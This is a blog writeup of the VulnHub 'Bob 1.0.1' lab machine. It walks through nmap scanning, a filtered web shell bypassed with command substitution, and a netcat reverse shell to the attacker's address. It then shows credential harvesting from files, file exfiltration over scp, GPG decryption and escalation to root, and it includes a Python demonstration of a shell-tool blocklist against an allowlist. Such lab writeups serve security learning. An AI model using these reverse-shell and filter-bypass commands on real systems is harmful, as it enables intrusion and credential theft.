Bob 1.0.1 – Writeup - The Hacking Blog (2024)

This machine is https://www.vulnhub.com/entry/bob-101,226/

I had to start by locating my target on the network using a host discovery scan:

root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 11:59 BST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00047s latency).
MAC Address: 08:00:27:DC:E0:98 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0010s latency).
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.56 seconds

Having used ifconfig on my machine, I knew that I was running on 192.168.56.102, so the target must be 192.168.56.101. I then used a service discovery scan to see what I could find:

root@kali:~# nmap -sV 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 12:01 BST
Nmap scan report for 192.168.56.101
Host is up (0.00087s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.74 seconds

Knowing there was an active webserver on the target, I first navigated to http://192.168.56.101 in a browser.

[screenshot 1]

From here I began exploring the linked pages and their source code; the first interesting thing I found was on the news page.

[screenshot 2]

SW4gb3RoZXIgbmV3cyBzb21lIGR1bWJhc3MgbWFkZSBhIGZpbGUgY2FsbGVkIHBhc3N3b3Jkcy5odG1sLCBjb21wbGV0ZWx5IGJyYWluZGVhZA0KDQotQm9i

This looked like base64, so I decoded it:

In other news some dumbass made a file called passwords.html, completely braindead

-Bob

I then went to /passwords.html in case it was still there.

[screenshot 3]

This also had relevant things in the source.

[screenshot 4]

The mention of a webshell is interesting, and there is a further reference to it on the login.html page.

[screenshot 5]

From the contacts page I then found a list of the IT dept, which might be useful when looking for accounts to compromise.

[screenshot 6]

I then began to dig for more information on this shell using dirbuster and by manually trying some URLs, but did not find it. So I moved back to nmap for further enumeration, this time across all ports:

root@kali:~# nmap -sV -p- 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 13:04 BST
Nmap scan report for 192.168.56.101
Host is up (0.00081s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds

I now knew where the ssh service was, but that wasn't helpful yet. So I ran another scan, with the default scripts, to look into the services:

root@kali:~# nmap -sC -p- 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 13:08 BST
Nmap scan report for 192.168.56.101
Host is up (0.00069s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
80/tcp    open  http
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-title: Site doesn't have a title (text/html).
25468/tcp open  unknown
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds

Now I had some useful leads from robots.txt; I started with /lat_memo.html.

[screenshot 7]

This alerted me that the shell might be unauthenticated, but that there are filters on the commands, so I headed over to /dev_shell.php.

[screenshot 8]

Now that I had some form of command execution, I needed a listener to receive any connection back from the machine:

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

I then began to use the shell, first entering:

nc -e /bin/bash 192.168.56.102 4444

[screenshot 9]

This hadn't worked. I then wanted to work out if I could run multiple commands at once, as often only the first one gets filtered. So I tried:

pwd && pwd

But I got the error again. I then tried other ways of chaining multiple executions, and kept getting the error until I eventually tried:

echo $(pwd)

[screenshot 10]

Now that I had command execution via command substitution, I tried:

echo $(nc -e /bin/bash 192.168.56.102 4444)

And checked back on my listener:

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 56510
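To make the filter gap concrete, here is an added example (my own code, not the machine's dev_shell.php, whose source the writeup does not show) that models a hypothetical first-word blocklist of the kind the commands above ran into, shows that it passes command substitution untouched, and contrasts it with an allowlist validator that only ever returns an argv list for subprocess without a shell:

```python
import re
import shlex

# Commands typed into the dev shell in the writeup, with the outcome seen there.
# Constructed list for the demonstration.
SUBMITTED = [
    "nc -e /bin/bash 192.168.56.102 4444",           # rejected by the filter
    "pwd && pwd",                                    # rejected by the filter
    "echo $(pwd)",                                   # accepted
    "echo $(nc -e /bin/bash 192.168.56.102 4444)",   # accepted: the bypass
]

# Hypothetical blocklist in the spirit of the dev shell's filter: it inspects
# only the first word and a few chaining operators.
BLOCKLIST = {"nc", "ncat", "bash", "sh", "python", "perl", "wget", "curl"}
CHAINERS = (";", "&&", "||", "|")


def naive_filter_allows(line):
    """Return True if the blocklist would hand this line to the shell.
    Nothing inside $( ... ) or backticks is ever inspected."""
    words = line.split()
    if not words or words[0] in BLOCKLIST:
        return False
    return not any(op in line for op in CHAINERS)


# Hardened check: refuse every shell metacharacter (including $, backticks and
# parentheses), then require an allowlisted program and plain-word arguments.
ALLOWLIST = {"pwd", "whoami", "id", "uptime", "date"}
META_CHARS = set('$`(){}|;&<>\\\n"\'*?~')
ARG_RE = re.compile(r"[A-Za-z0-9_./-]+")


def hardened_argv(line):
    """Return an argv list safe for subprocess.run(argv, shell=False),
    or None when the request must be refused."""
    if any(c in line for c in META_CHARS):
        return None
    argv = shlex.split(line)          # quotes/backslashes already refused above
    if not argv or argv[0] not in ALLOWLIST:
        return None
    if not all(ARG_RE.fullmatch(a) for a in argv[1:]):
        return None
    return argv


if __name__ == "__main__":
    for line in SUBMITTED:
        verdict = "pass" if naive_filter_allows(line) else "reject"
        print(f"{line!r}: blocklist={verdict}, allowlist argv={hardened_argv(line)}")
```

The blocklist lets both `echo $(...)` lines through exactly as the writeup observed, while the allowlist refuses them and only ever returns argv for a fixed set of harmless programs.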

I now had a shell on the machine, but first I wanted a nicer one:

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Milburg-High:/var/www/html$

Now I had a proper shell.

I started by looking around:

www-data@Milburg-High:/var/www/html$ ls -la
drwxr-xr-x 2 root root 4096 Mar 8 23:48 .
drwxr-xr-x 3 root root 4096 Feb 28 19:03 ..
-rw-r--r-- 1 root root 84 Mar 5 04:53 .hint
-rw-r--r-- 1 root root 340400 Mar 4 14:09 WIP.jpg
-rw-r--r-- 1 root root 2579 Mar 8 23:43 about.html
-rw-r--r-- 1 root root 3145 Mar 4 14:09 contact.html
-rw-r--r-- 1 root root 1396 Mar 4 14:09 dev_shell.php
-rw-r--r-- 1 root root 1361 Mar 4 14:09 dev_shell.php.bak
-rw-r--r-- 1 root root 1177950 Mar 4 14:09 dev_shell_back.png
-rw-r--r-- 1 root root 1425 Mar 4 14:09 index.html
-rw-r--r-- 1 root root 1425 Mar 4 14:09 index.html.bak
-rw-r--r-- 1 root root 1925 Mar 4 14:09 lat_memo.html
-rw-r--r-- 1 root root 1560 Mar 4 14:09 login.html
-rw-r--r-- 1 root root 4086 Mar 4 14:09 news.html
-rw-r--r-- 1 root root 673 Mar 8 23:43 passwords.html
-rw-r--r-- 1 root root 111 Mar 4 14:09 robots.txt
-rw-r--r-- 1 root root 26357 Mar 4 14:09 school_badge.png

First I checked out the file called .hint:

www-data@Milburg-High:/var/www/html$ cat .hint
Have you tried spawning a tty shell?
Also don't forget to check for hidden files ;)

Well, I had already done the first, and I was already doing the second, so the hint wasn't helpful. Next I wanted to check out the home dirs:

www-data@Milburg-High:/var/www/html$ cd /home
www-data@Milburg-High:/home$ ls -la
drwxr-xr-x 6 root root 4096 Mar 4 13:45 .
drwxr-xr-x 22 root root 4096 Mar 5 04:50 ..
drwxr-xr-x 18 bob bob 4096 Mar 8 23:31 bob
drwxr-xr-x 15 elliot elliot 4096 Feb 27 18:38 elliot
drwxr-xr-x 15 jc jc 4096 Feb 27 18:20 jc
drwxr-xr-x 15 seb seb 4096 Mar 5 01:18 seb

I began at bob's:

www-data@Milburg-High:/home$ cd bob
www-data@Milburg-High:/home/bob$ ls -la
drwxr-xr-x 18 bob bob 4096 Mar 8 23:31 .
drwxr-xr-x 6 root root 4096 Mar 4 13:45 ..
-rw------- 1 bob bob 1980 Mar 8 23:31 .ICEauthority
-rw------- 1 bob bob 214 Mar 8 23:48 .Xauthority
-rw------- 1 bob bob 6403 Mar 8 23:48 .bash_history
-rw-r--r-- 1 bob bob 220 Feb 21 18:10 .bash_logout
-rw-r--r-- 1 bob bob 3548 Mar 5 01:14 .bashrc
drwxr-xr-x 7 bob bob 4096 Feb 21 18:15 .cache
drwx------ 8 bob bob 4096 Feb 27 17:56 .config
-rw-r--r-- 1 bob bob 55 Feb 21 18:22 .dmrc
drwxr-xr-x 2 bob bob 4096 Feb 21 19:48 .ftp
drwx------ 3 bob bob 4096 Mar 5 00:45 .gnupg
drwxr-xr-x 3 bob bob 4096 Feb 21 18:13 .local
drwx------ 4 bob bob 4096 Feb 21 18:13 .mozilla
drwxr-xr-x 2 bob bob 4096 Mar 4 14:03 .nano
-rw-r--r-- 1 bob bob 72 Mar 5 04:12 .old_passwordfile.html
-rw-r--r-- 1 bob bob 675 Feb 21 18:10 .profile
drwx------ 2 bob bob 4096 Mar 5 02:45 .vnc
-rw-r--r-- 1 bob bob 25211 Mar 8 23:31 .xfce4-session.verbose-log
-rw-r--r-- 1 bob bob 27563 Mar 7 21:32 .xfce4-session.verbose-log.last
-rw------- 1 bob bob 3672 Mar 8 23:48 .xsession-errors
-rw------- 1 bob bob 2866 Mar 7 21:32 .xsession-errors.old
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Desktop
drwxr-xr-x 3 bob bob 4096 Mar 5 01:02 Documents
drwxr-xr-x 3 bob bob 4096 Mar 8 23:33 Downloads
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Music
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Pictures
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Public
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Templates
drwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Videos

The .old_passwordfile.html looked interesting, so I took a look at that:

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
#<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

Now I had creds which might be used for ssh, so I gave it a go:

root@kali:~# ssh jc@192.168.56.101 -p 25468
[ASCII-art SSH banner]
jc@192.168.56.101's password:

I then tried Qwerty as the password:

jc@Milburg-High:~$

Now I had proper ssh access. I began to dig into what I could do:

jc@Milburg-High:~$ sudo -l
Matching Defaults entries for jc on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jc may run the following commands on Milburg-High:
    (ALL) NOPASSWD: /usr/bin/service apache2 *
    (root) NOPASSWD: /bin/systemctl start ssh

I didn't see a potential exploit here, so I carried on looking into the home folders; then in elliot's I found something:

jc@Milburg-High:/home/elliot$ ls -la
drwxr-xr-x 15 elliot elliot 4096 Feb 27 18:38 .
drwxr-xr-x 6 root root 4096 Mar 4 13:45 ..
-rw------- 1 elliot elliot 121 Mar 8 23:47 .bash_history
-rw-r--r-- 1 elliot elliot 220 Feb 27 18:04 .bash_logout
-rw-r--r-- 1 elliot elliot 3526 Feb 27 18:04 .bashrc
drwxr-xr-x 7 elliot elliot 4096 Feb 27 18:25 .cache
drwx------ 8 elliot elliot 4096 Feb 27 18:37 .config
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:25 Desktop
-rw-r--r-- 1 elliot elliot 55 Feb 27 18:21 .dmrc
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:36 Documents
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:25 Downloads
drwx------ 3 elliot elliot 4096 Feb 27 18:21 .gnupg
-rw------- 1 elliot elliot 0 Feb 27 18:38 .ICEauthority
drwxr-xr-x 3 elliot elliot 4096 Feb 27 18:21 .local
drwx------ 4 elliot elliot 4096 Feb 27 18:21 .mozilla
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Music
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Pictures
-rw-r--r-- 1 elliot elliot 675 Feb 27 18:04 .profile
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Public
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Templates
-rw-r--r-- 1 elliot elliot 1509 Feb 27 18:38 theadminisdumb.txt
drwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Videos
-rw------- 1 elliot elliot 55 Feb 27 18:21 .Xauthority
-rw-r--r-- 1 elliot elliot 17258 Feb 27 18:38 .xfce4-session.verbose-log
-rw------- 1 elliot elliot 4486 Feb 27 18:38 .xsession-errors

The file that interested me was theadminisdumb.txt, so I checked that out:

cat theadminisdumb.txt
hey n there theadminisdumb.txt

This was weird, and after a bit of testing I noticed that the cat command had been replaced with a command that always displayed:

hey n there [filename]

So I used less instead:

jc@Milburg-High:/home/elliot$ less theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to
theadminisdumb
I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.

Now I had some more creds, elliot:theadminisdumb, so I switched to elliot with su in case he had more access:

jc@Milburg-High:/home/elliot$ su elliot
elliot@Milburg-High:~$

I then checked to see if I had more access:

elliot@Milburg-High:~$ sudo -l
Matching Defaults entries for elliot on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on Milburg-High:
    (ALL) NOPASSWD: /usr/bin/service apache2 *
    (root) NOPASSWD: /bin/systemctl start ssh

So I didn't have more privs via sudo. I went back to digging into files, eventually ending up in /home/bob/Documents:

elliot@Milburg-High:/home/bob/Documents$ ls -la
drwxr-xr-x 3 bob bob 4096 Mar 5 01:02 .
drwxr-xr-x 18 bob bob 4096 Mar 8 23:31 ..
-rw-r--r-- 1 bob bob 91 Mar 5 00:58 login.txt.gpg
drwxr-xr-x 3 bob bob 4096 Mar 5 00:35 Secret
-rw-r--r-- 1 bob bob 300 Mar 4 14:11 staff.txt

I then inspected these files:

elliot@Milburg-High:/home/bob/Documents$ cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a sh*t about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired

Not that helpful. But at least the cat command worked properly on this account. Next I inspected the login.txt.gpg file, as it looked like it would be encrypted:

elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)

With nothing useful there yet, I started inspecting the Secret folder:

elliot@Milburg-High:/home/bob/Documents$ cd Secret
elliot@Milburg-High:/home/bob/Documents/Secret$ ls -la
drwxr-xr-x 3 bob bob 4096 Mar 5 00:35 .
drwxr-xr-x 3 bob bob 4096 Mar 5 01:02 ..
drwxr-xr-x 4 bob bob 4096 Mar 5 00:39 Keep_Out
elliot@Milburg-High:/home/bob/Documents/Secret$ cd Keep_Out
elliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls -la
drwxr-xr-x 4 bob bob 4096 Mar 5 00:39 .
drwxr-xr-x 3 bob bob 4096 Mar 5 00:35 ..
drwxr-xr-x 3 bob bob 4096 Mar 5 04:43 Not_p*rn
drwxr-xr-x 2 bob bob 4096 Mar 5 00:39 p*rn

At this point I got bored of manually searching and used find:

elliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ find . -type f
./Not_p*rn/No_Lookie_In_Here/notes.sh
./p*rn/no_p*rn_4_u

I then inspected these files:

elliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cat ./Not_p*rn/No_Lookie_In_Here/notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

This didn't make much sense so I moved on, and the other file was empty. I decided to exfil the encrypted file to my own machine:

root@kali:~# scp -P 25468 elliot@192.168.56.101:/home/bob/Documents/login.txt.gpg login.txt.gpg

using theadminisdumb as the password when prompted:

login.txt.gpg 100% 91 28.8KB/s 00:00

I then dug around for ages, and eventually began to stare at the output of the notes.sh file, until I noticed that the first letter of every line spelt HARPOCRATES, which I knew to be a god. This made me pretty sure notes.sh was a password reminder script. So I tried using HARPOCRATES as the passphrase to decrypt the login file:

root@kali:~# gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
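The acrostic can be pulled out mechanically rather than by staring at it; this is an added example (my own code, not from the writeup) that parses the echo lines out of notes.sh and builds the first-letter acrostic, skipping the "-= Notes =-" banner because it does not start with a letter:

```python
import re

# Constructed copy of notes.sh as printed in the writeup.
NOTES_SH = """#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
"""

# Matches a line of the form: echo "..."  (double-quoted argument only)
ECHO_RE = re.compile(r'^\s*echo\s+"(.*)"\s*$')


def echoed_lines(script):
    """Return the strings the script would print, in order."""
    lines = []
    for line in script.splitlines():
        m = ECHO_RE.match(line)
        if m:
            lines.append(m.group(1))
    return lines


def acrostic(lines):
    """Join the first character of every line that begins with a letter,
    upper-cased; banners such as "-= Notes =-" are ignored."""
    return "".join(l[0] for l in lines if l and l[0].isalpha()).upper()


if __name__ == "__main__":
    print(acrostic(echoed_lines(NOTES_SH)))   # HARPOCRATES
```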

Now I had creds for bob, so I switched over to that account with su:

elliot@Milburg-High:/home/bob/Documents$ su bob
bob@Milburg-High:~/Documents$

Now to see what bob could do:

bob@Milburg-High:~/Documents$ sudo -l
Matching Defaults entries for bob on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on Milburg-High:
    (ALL : ALL) ALL

This meant I could now get root:

bob@Milburg-High:~/Documents$ sudo su
root@Milburg-High:/home/bob/Document#

Now all that was left to do was grab the flag:

root@Milburg-High:/home/bob/Document# cd /
root@Milburg-High:/# ls -la
drwxr-xr-x 22 root root 4096 Mar 5 04:50 .
drwxr-xr-x 22 root root 4096 Mar 5 04:50 ..
drwxr-xr-x 2 root root 4096 Feb 21 15:38 bin
drwxr-xr-x 3 root root 4096 Feb 21 15:43 boot
drwxr-xr-x 17 root root 3000 Jul 2 06:57 dev
drwxr-xr-x 114 root root 4096 Mar 8 23:48 etc
-rw------- 1 root root 335 Mar 5 04:50 flag.txt
drwxr-xr-x 6 root root 4096 Mar 4 13:45 home
lrwxrwxrwx 1 root root 29 Feb 21 15:16 initrd.img -> boot/initrd.img-4.9.0-4-amd64
lrwxrwxrwx 1 root root 29 Feb 21 15:16 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64
drwxr-xr-x 15 root root 4096 Feb 21 15:40 lib
drwxr-xr-x 2 root root 4096 Feb 21 15:14 lib64
drwx------ 2 root root 16384 Feb 21 15:14 lost+found
drwxr-xr-x 3 root root 4096 Feb 21 15:14 media
drwxr-xr-x 2 root root 4096 Feb 21 15:14 mnt
drwxr-xr-x 2 root root 4096 Feb 21 15:14 opt
dr-xr-xr-x 115 root root 0 Jul 2 06:57 proc
drwx------ 16 root root 4096 Feb 28 19:07 root
drwxr-xr-x 23 root root 680 Jul 2 09:17 run
drwxr-xr-x 2 root root 4096 Feb 21 15:43 sbin
drwxr-xr-x 3 root root 4096 Mar 4 13:42 srv
dr-xr-xr-x 13 root root 0 Jul 2 08:57 sys
drwxrwxrwt 11 root root 4096 Jul 2 09:17 tmp
drwxr-xr-x 10 root root 4096 Feb 21 15:14 usr
drwxr-xr-x 12 root root 4096 Feb 28 19:03 var
lrwxrwxrwx 1 root root 26 Feb 21 15:16 vmlinuz -> boot/vmlinuz-4.9.0-4-amd64
lrwxrwxrwx 1 root root 26 Feb 21 15:16 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64
root@Milburg-High:/# cat flag.txt
CONGRATS ON GAINING ROOT
[ASCII-art flag, including "#root"]
Thanks for playing
~c0rruptedb1t

And with that the machine was completed!


Author: Tish Haag
